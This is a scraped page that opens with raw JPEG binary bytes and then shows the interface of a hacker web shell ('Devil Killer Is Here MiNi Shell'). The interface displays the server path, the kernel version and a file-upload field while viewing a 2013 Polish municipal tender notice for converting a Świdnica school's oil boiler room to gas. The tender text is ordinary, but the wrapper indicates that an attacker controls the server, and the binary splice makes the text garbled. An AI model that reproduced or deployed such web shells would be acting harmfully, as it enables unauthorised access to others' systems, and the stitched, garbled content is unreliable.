JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/264946-N-2013.html

<p class="kh_header"><b>Świdnica: Wykonanie robót budowlanych w zakresie: Przebudowa kotłowni olejowej na kotłownie gazową w Szkole Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy
w ramach projektu pn.: Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy - modernizacja obiektów dydaktycznych na terenie powojskowym - etap I</b><br>
<b>Numer ogłoszenia: 264946 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w zakresie: Przebudowa kotłowni olejowej na kotłownie gazową w Szkole Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy
w ramach projektu pn.: Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy - modernizacja obiektów dydaktycznych na terenie powojskowym - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3/ OPIS PRZEDMIOTU ZAMÓWIENIA
3.1 Opis przedmiotu i cel zamówienia
Przedmiot zamówienia obejmuje roboty budowlane polegające na przebudowie kotłowni o mocy znamionowej 500 kW opalanej olejem opałowym lekkim na kotłownię gazową. Modernizowana kotłownia zlokalizowana jest w budynku B Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy położonej na działce nr 1996, AM11, Obr. 0005 Zachód.
Zakres robót budowlanych obejmuje m.in.:
A. Roboty technologiczne i instalacyjne:
-  Demontaż części istniejących urządzeń technologicznych, rurociągów i instalacji;
-  Montaż urządzeń technologicznych, w tym nowego kotła kondensacyjnego gazowego o mocy znamieniowej 500 kW, rurociągów i armatury z wpięciem ich do istniejącej instalacji technologicznej w kotłowni;
-  Montaż punktu redukcyjno-pomiarowego na elewacji budynku oraz wewnętrznej instalacji gazowej zasilającej  kocioł; 
-  Wymiana wkładu kominowego; 
-  Wykonanie zgodnej z przepisami instalacji wentylacji grawitacyjnej w kotłowni;
-  Montaż Aktywnego Systemu Bezpieczeństwa Instalacji Gazowej;
-  Regulacja działania instalacji, palnika, kotła, naczynia wzbiorczego;
-  Badania i odbiory instalacji sanitarnych w kotłowni;
-  Badania i odbiór instalacji gazowej (w tym: próba szczelności instalacji gazowej; próba instalacji gazowej na ciśnienie dla wykonawcy i dostawcy gazu przed gazomierzem w budynku);
-  Izolacja termiczna rurociągów.

B. Roboty budowlane:
- Adaptacja pomieszczenia dotychczasowej kotłowni olejowej na kotłownię gazową zgodnie z częścią   
  budowlaną projektu;
- Zabezpieczenie przepustów rurociągów i instalacji elektrycznych w ścianach kotłowni zgodnie z wytycznymi p-poż;
-  Zapewnienie dostępu do dotychczasowego magazynu oleju z korytarza piwnicznego;
- Wykonanie otworu montażowego w ścianie klatki schodowej na czas wprowadzenia kotła i jego likwidacja;
- Wykonanie otworów wentylacyjnych w pomieszczeniach, przez które przebiegać będzie instalacja gazowa.

C. Roboty elektryczne:
-  Demontaż części elementów istniejącej instalacji elektrycznej zgodnie z projektem;
-  Montaż instalacji zasilania nowozamontowanych urządzeń technologicznych wyposażenia kotłowni;
-  Montaż instalacji sterowania i sygnalizacji; 
-  Montaż zabezpieczeń przed porażeniem prądem elektrycznym;
-  Podłączenie elektryczne elementów systemu ASBIG;
-  Montaż elementów instalacji elektrycznej i automatyki z wpięciem w istniejącą tablicę elektryczną w kotłowni;
-  Montaż systemu powiadomienia MGSM;
-  Wykonanie pomiarów instalacji elektrycznej.

D. Roboty towarzyszące:  
-	Opracowanie planu bezpieczeństwa i ochrony zdrowia BIOZ,
-	Organizacja, utrzymanie i likwidacja placu budowy;
-  Usuwanie odpadów i zanieczyszczeń z terenu budowy wraz z ich utylizacją;
-  Realizacja nadzoru i kierownictwa prac montażowych przez osoby wykwalifikowane.


3.2. Wspólny słownik zamówień publicznych CPV
 45000000-7  Roboty budowlane
45100000-8  Przygotowanie terenu pod budowę
45330000-9  Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45310000-3  Roboty instalacyjne elektryczne
45400000-1  Roboty wykończeniowe w zakresie obiektów budowlanych
45333000-0 Roboty instalacyjne gazowe
45333100-1 Instalowanie urządzeń regulacji gazu

3.3. Lokalizacja  
Inwestycja obejmuje przebudowę kotłowni o mocy znamionowej 500 kW opalanej olejem opałowym lekkim                     na kotłownię gazową zlokalizowanej w jednym z budynku B Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39                w Świdnicy położonej na działce nr 1996, AM11, Obr. 0005 Zachód. Zamawiający zaleca dokonania wizji lokalnej terenu przeznaczonego pod realizację przedmiotu zamówienia.

3.4.  Zakres przedmiotu zamówienia 
Przedmiot zamówienia szczegółowo został opisany w specyfikacji technicznej wykonania i odbioru robót,                   w projekcie budowlanym i w projekcie wykonawczym autorstwa: ASCO - Adam Strzelczyk, ul. Staszica 22,                 58-200 Dzierżoniów pn.:
 - Projekt budowlany dla zadania pn: Przebudowa kotłowni o mocy 500 kW opalanej olejem opałowym lekkim            na gazową w Szkole Podstawowej Nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy;
-  Projekt wykonawczy dla zadania pn.: Przebudowa kotłowni o mocy 500 kW opalanej olejem opałowym lekkim na gazową  w Szkole Podstawowej Nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy;
-  Specyfikacja techniczna ST1 dla zadania pn.: Przebudowa kotłowni o mocy 500 kW opalanej olejem opałowym lekkim na gazową w Szkole Podstawowej Nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy.
a także w przedmiarze robót, który stanowi wyłącznie materiał pomocniczy dla wskazania technologii,                  która rzutuje na wysokość ceny Wykonawcy.
Projekty i specyfikacja techniczna ST1 stanowią załącznik C do SIWZ  do niniejszej specyfikacji i wraz                           z przedmiarami robót, stanowią załącznik D do SIWZ,  znajdują się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.pl w katalogu zamówienia publiczne. Dokumentacja projektowa znajduje się do wglądu w siedzibie Zamawiającego- Urząd Miejski w Świdnicy, przy ulicy Armii Krajowej nr 49, Referat Inwestycji - pok. 218 do wglądu.
UWAGA! Przedmiar robót stanowi wyłącznie materiał poglądowy, nie stanowi samodzielnego opisu przedmiotu zamówienia  i nie należy mu przypisywać roli funkcji o których mowa w § 4 ust.1 pkt. 3 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. (Dz. U. z 2004 r. nr 202, poz. 2072). Załączony jest w celu ułatwienia dokonania wyceny oferty przez Wykonawcę. Przedmiaru nie należy wypełniać ani załączać do oferty.

4/ WARUNKI REALIZACJI, ODBIORU I ROZLICZENIA ROBÓT:

4.1. Warunki realizacji robót:
- Przekazanie placu budowy nastąpi w terminie do 10 dni kalendarzowych od daty podpisania umowy.
- Zamawiający zapewnia nadzór inwestorski.
- Wykonawca zapewni sprawowanie kierownictwa budowy i robót przez osoby posiadające odpowiednie kwalifikacje zawodowe i uprawnienia do kierowania robotami budowlanymi                         w odpowiednich specjalnościach, zgodnie z wymogami Prawa Budowlanego oraz i doświadczenie przy realizacjach tożsamych  z przedmiotem zamówienia;
- Za koordynację robót branżowych i prowadzenie dokumentacji budowy odpowiadać będzie kierownik budowy.
- Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia z należytą starannością, zgodnie z projektem i specyfikacją techniczną, obowiązującymi normami technicznymi, standardami, zasadami sztuki i etyką zawodową oraz postanowieniami projektu umowy;
- Wykonawca umieści na budowie w widocznym miejscu tablicę informacyjną, ogłoszenie zawierające dane dotyczące bezpieczeństwa pracy i ochrony zdrowia. 
- Wykonawca zobowiązany jest do przestrzegania warunków instytucji opiniujących projekt.
- Wykonawca zrealizuje roboty budowlane zgodnie z reżimem technologicznym, określonym przez Polskie Normy, producentów poszczególnych elementów, produktów, materiałów i urządzeń. 
- Wszystkie użyte do budowy materiały muszą odpowiadać parametrom podanym w projekcie, powinny posiadać odpowiedni atest i świadectwo dopuszczenia, wydane przez odpowiednio uprawnione instytucje, zezwalające na stosowanie ich w budownictwie. Dokumenty te należy przedłożyć inspektorowi nadzoru inwestorskiego i Zamawiającemu.
- Wszelkie rozbieżności stwierdzone w trakcie prowadzenia robót pomiędzy założeniami przyjętymi w projekcie a stanem faktycznym, mającymi wpływ na prawidłowe wykonanie prac będą uzgadniane z projektantem w ramach nadzoru autorskiego.
- Zamawiający zachowuje prawo dostępu do terenu budowy dla wskazanych przez siebie innych wykonawców,  a Wykonawca tego prawa nie może ograniczyć (np.: Zakład Gazowniczy)
- Wykonawca zrealizuje własnym staraniem tymczasowe obiekty i urządzenia na terenie placu budowy: punkt poboru wody, punkt poboru energii elektrycznej, zabezpieczenie terenu budowy. 
- Wykonawca będzie ponosił koszty organizacji terenu budowy, oznakowania i zagospodarowania zaplecza budowy, zużycia wody i energii elektrycznej oraz gazu w okresie realizacji robót, koszty utrzymania i konserwacji tymczasowych obiektów i urządzeń związanych z terenem budowy oraz inne nakłady nie stanowiące wartości robót budowlanych, a niezbędne do wykonania przedmiotu umowy w/w koszty Wykonawca ujmie w cenie ofertowej.
- Obsługa geodezyjna, inwentaryzacja powykonawcza oraz inne nakłady nie stanowiące wartości robót budowlanych, a niezbędne do wykonania  przedmiotu umowy należy objąć ceną ofertową.
- Wykonawca jest odpowiedzialny za szkody powstałe w trakcie realizacji robót również wobec osób trzecich oraz w wyniku nieterminowego ich naprawienia.
- Wykonawca zobowiązany będzie do utrzymania i konserwacji nawierzchni na terenie budowy               w okresie przejściowym tj. obejmującym czas od przekazania placu budowy Wykonawcy                       do czasu odbioru końcowego przedmiotu zamówienia przez Zamawiającego.
- Wykonawca zobowiązany jest do przekazania na właściwe wysypisko odpadów materiałów                         z rozbiórki nie nadających się do ponownego wbudowania.
- Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy                          i przekazania go Zamawiającemu.

4.2 Warunki odbioru robót:
- Wykonawca zgłasza Inspektorowi Nadzoru do odbioru wszystkie roboty zanikowe.
- W dniu zgłoszenia gotowości do odbioru końcowego Wykonawca dostarcza inspektorowi nadzoru inwestorskiego wszystkie wymagane dokumenty odbiorowe: protokoły technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, dokumentację powykonawczą, atesty                   i aprobaty na wbudowane materiały.
- Dokumentem potwierdzającym przejęcie przez Zamawiającego wykonanego przedmiotu zamówienia jest protokół końcowy odbioru robót, podpisany przez strony umowy, którego integralną częścią będą dokumenty niżej wymienione dostarczone przez Wykonawcę inspektorowi nadzoru inwestorskiego w dniu zgłoszenia gotowości do odbioru końcowego zadania  w tym: 
a. oryginał dziennika budowy, 
b. protokoły technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, 
c. dokumentację powykonawczą, 
d. atesty i aprobaty na wbudowane materiały, 
e. protokoły badań i sprawdzeń jakości robót i materiałów, w tym świadectwa zezwalające                   na stosowanie materiałów w budownictwie,
f. inwentaryzację geodezyjną powykonawczą,
g. oświadczenie kierownika budowy: o zgodności wykonania obiektu budowlanego z projektem 
    budowlanym i warunkami pozwolenia na budowę oraz przepisami, o doprowadzeniu do  
 należytego stanu i porządku terenu budowy, a zwłaszcza budynku szkoły w którym  
 prowadzone będą roboty budowlane.
h. kartę gwarancyjną na wykonane roboty budowlane.
- Zamawiający przystąpi do czynności odbiorowych przedmiotu zamówienia w terminie do 10 dni roboczych od daty zgłoszenia gotowości do odbioru robót. Podstawą rozpoczęcia czynności odbioru końcowego będzie protokół z pozytywnie przeprowadzonej próby szczelności instalacji gazowej oraz próby instalacji gazowej na ciśnienie dla wykonawcy i dostawcy gazu przed gazomierzem w budynku, zawiadomienie pisemne Wykonawcy o gotowości do czynności odbiorowych, wpis kierownika budowy do dziennika budowy o zakończeniu wszystkich robót będących przedmiotem odbioru potwierdzony ze strony Zamawiającego przez inspektora nadzoru oraz potwierdzenie inspektora nadzoru kompletności przekazanych mu przez Wykonawcę dokumentów odbiorowych. 
- Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy                         i przekazania go  Zamawiającemu.

4.3 Warunki rozliczenia robót:
- Za wykonanie przedmiotu umowy ustala się wynagrodzenie ryczałtowe zgodne z ceną ofertową Wykonawcy, z zastrzeżeniem jak niżej.
- Cena ryczałtowa uwzględnia wszystkie koszty wynikające z obowiązków Wykonawcy określonych  w niniejszej SIWZ i w projekcie umowy;
- Końcowe rozliczenie zużytej energii i wody przez Wykonawcę robót budowlanych zostanie rozliczone przy udziale Zamawiającego, Inspektora Nadzoru, Wykonawcy robót budowlanych oraz Użytkownika i w całości koszt ten pokrywa Wykonawca robót budowlanych.
- Wszystkie faktury za zużycie gazu w okresie od przekazania placu budowy do dnia odbioru końcowego stanowią koszt Wykonawcy robót budowlanych i muszą być przez niego zapłacone przed otrzymaniem zapłaty za fakturę końcową.
- Przedmiot zamówienia zostanie rozliczony: jedną fakturą końcową za wykonanie przedmiotu zamówienia. 
- Podstawą wystawienia faktury końcowej będzie protokół końcowego odbioru robót. Należność              za fakturę końcową zostanie uregulowana po przedstawieniu Zamawiającemu oświadczenia Podwykonawcy o uregulowaniu przez Wykonawcę wszystkich zobowiązań w pełnej wartości robót wykonanych przez Podwykonawcę, w ramach niniejszej umowy wraz z dokumentem rozliczeniowym potwierdzającym dokonanie przez Wykonawcę zapłaty za roboty wykonane przez Podwykonawcę w okresie rozliczeniowym (łącznie z kopią przelewu bankowego potwierdzoną przez Wykonawcę za zgodność z oryginałem) lub po pisemnym oświadczeniu Wykonawcy,               że roboty w okresie rozliczeniowym, którego dotyczy faktura wykonywał siłami własnymi.
- Faktura końcowa może być wystawione po protokolarnym końcowym odbiorze robót  przez Zamawiającego i przekazaniu uporządkowanego terenu budowy Zamawiającemu przy udziale Inspektora Nadzoru oraz Użytkownika.
- Termin płatności faktury ustala się do 30 dni od daty dostarczenia ich Zamawiającemu.
- Szczegółowe warunki rozliczenia robót są zgodne z projektem umowy dołączonym do SIWZ.
UWAGA: Wszelkie prace wykonywane będą na obiekcie czynnym i należy je przeprowadzać                       w sposób zapewniający ciągłość pracy i bezpieczeństwo osób i mienia znajdujących się w strefie zagrożenia. Wszelkie koszty związane ze stratami przez niewłaściwe zabezpieczenie obiektu będą obciążać Wykonawcę.

Przedmiotowe zamówienie obejmuje zakres robót budowlanych: Przebudowa kotłowni olejowej na kotłownie gazową w Szkole Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy będących częścią projektu pn.: Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy - modernizacja obiektów dydaktycznych na terenie powojskowym - etap I, który został złożony przez Inwestora - tj. Gminę Miasto Świdnica do Urzędu Marszałkowskiego Województwa Dolnośląskiego w celu pozyskanie dofinansowania                             ze środków pomocowych na realizację inwestycji w ramach RPO dla Województwa Dolnośląskiego Działanie nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców w Priorytecie nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta).
W sytuacji rażącego zaniedbania Wykonawcy mogącego skutkować np. utratą dofinansowania                           ze środków UE w ramach RPO dla Województwa Dolnośląskiego Zamawiający ma prawo odstąpić od umowy oraz żądać od Wykonawcy stosownego odszkodowania.

Podane w dokumentacji projektowej nazwy i producent są przykładowe. Zastosowane urządzenia powinny posiadać parametry równoważne, nie gorsze niż wymagane w dokumentacji projektowej.

5/ WYMAGANY TERMIN WYKONANIA ZAMÓWIENIA:

     Zamawiający wyznacza nieprzekraczalny termin wykonania zamówienia tj.:
a)	rozpoczęcie realizacji: w dniu podpisania umowy

b)	zakończenie realizacji: 30 wrzesień 2013 rok rozumiany jako data podpisania bezusterkowego protokołu odbioru końcowego wykonanych robót..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art.67 ust.1 pkt.6 i pkt.7 UPZP przewiduje  możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 10% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.33.00.00-9, 45.31.00.00-3, 45.40.00.00-1, 45.33.30.00-0, 45.33.31.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12/ WYMAGANIA DOTYCZĄCE WADIUM

1.	Oferta powinna być zabezpieczona wadium w wysokości: 3.500,00 zł (słownie: trzy tysiące pięćset złotych 00/100).
Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. do dnia 26.07.2013r. przed godz. 09.00.
2.	Wadium może być wniesione w formach określonych w art.45 ust.6 Prawa Zamówień Publicznych,                      z tym, że:
a.	złożone w pieniądzu:
przelewem na rachunek bankowy Zamawiającego w Banku PKO. S.A. I Oddział  w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert;
b.	złożone w gwarancjach (bankowych , ubezpieczeniowych):
z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy Pzp           tj. w przypadku, gdy Wykonawca:
-odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                   w ofercie,
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących              po stronie Wykonawcy;
c.	złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony za potwierdzeniem, przed upływem terminu składania ofert.; 
d.	W przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art. 23 ustawy Pzp.
3.	Dowód przelewu lub potwierdzenie depozytu należy dołączyć w oryginale do oferty (w przypadku przelewu kserokopię odcinka D).
4.	Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą.                     Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
5.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w pkt. 8.
6.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
7.	Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a.	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d.	w odpowiedzi na wezwanie , o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń,              o których mowa w art.25 ust.1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością, co najmniej dwa zamówienia polegające na budowie lub modernizacji kotłowni gazowej z czego co najmniej jedno z zamówień o wartości nie mniejszej niż 100.000,00 zł netto (przez określenie wartości robót zamówienia należy rozumieć łączną wartość robót tylko dla branży instalacji wewnętrznej gazowej obejmującej roboty technologiczne i instalacyjne w zakresie określonym jak powyżej).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli dysponuje osobami zdolnymi do wykonania niniejszego zamówienia posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń                                  w specjalnościach:
-   konstrukcyjno-budowlanej: osoba pełniąca funkcję kierownika budowy;
- instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych,  wentylacyjnych i gazowych: osoba pełniąca funkcję kierownika robót branży instalacji sanitarnych;
-  instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych: osoba pełniąca funkcję kierownika robót branży instalacji elektrycznych;
wymaganych ustawą Prawo Budowlane (Dz. U. z 2010r. nr 243, poz. 1623, z póz. zm. art.14.1.2 i 14.1.4.). W przypadku uprawnień uzyskanych przed wejściem w życie ww. ustawy należy powołać się na inne aktualne uprawnienia, odpowiednie do zakresu pełnionych funkcji.
Wskazane powyżej osoby powinny posiadać minimum 3 letnie doświadczenie przy realizacjach tożsamych z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 200.000,00 zł (słownie: dwieście tysięcy złotych) oraz wykaże, że posiada ubezpieczenie  od odpowiedzialności cywilnej                w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą jak: 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych).</p>
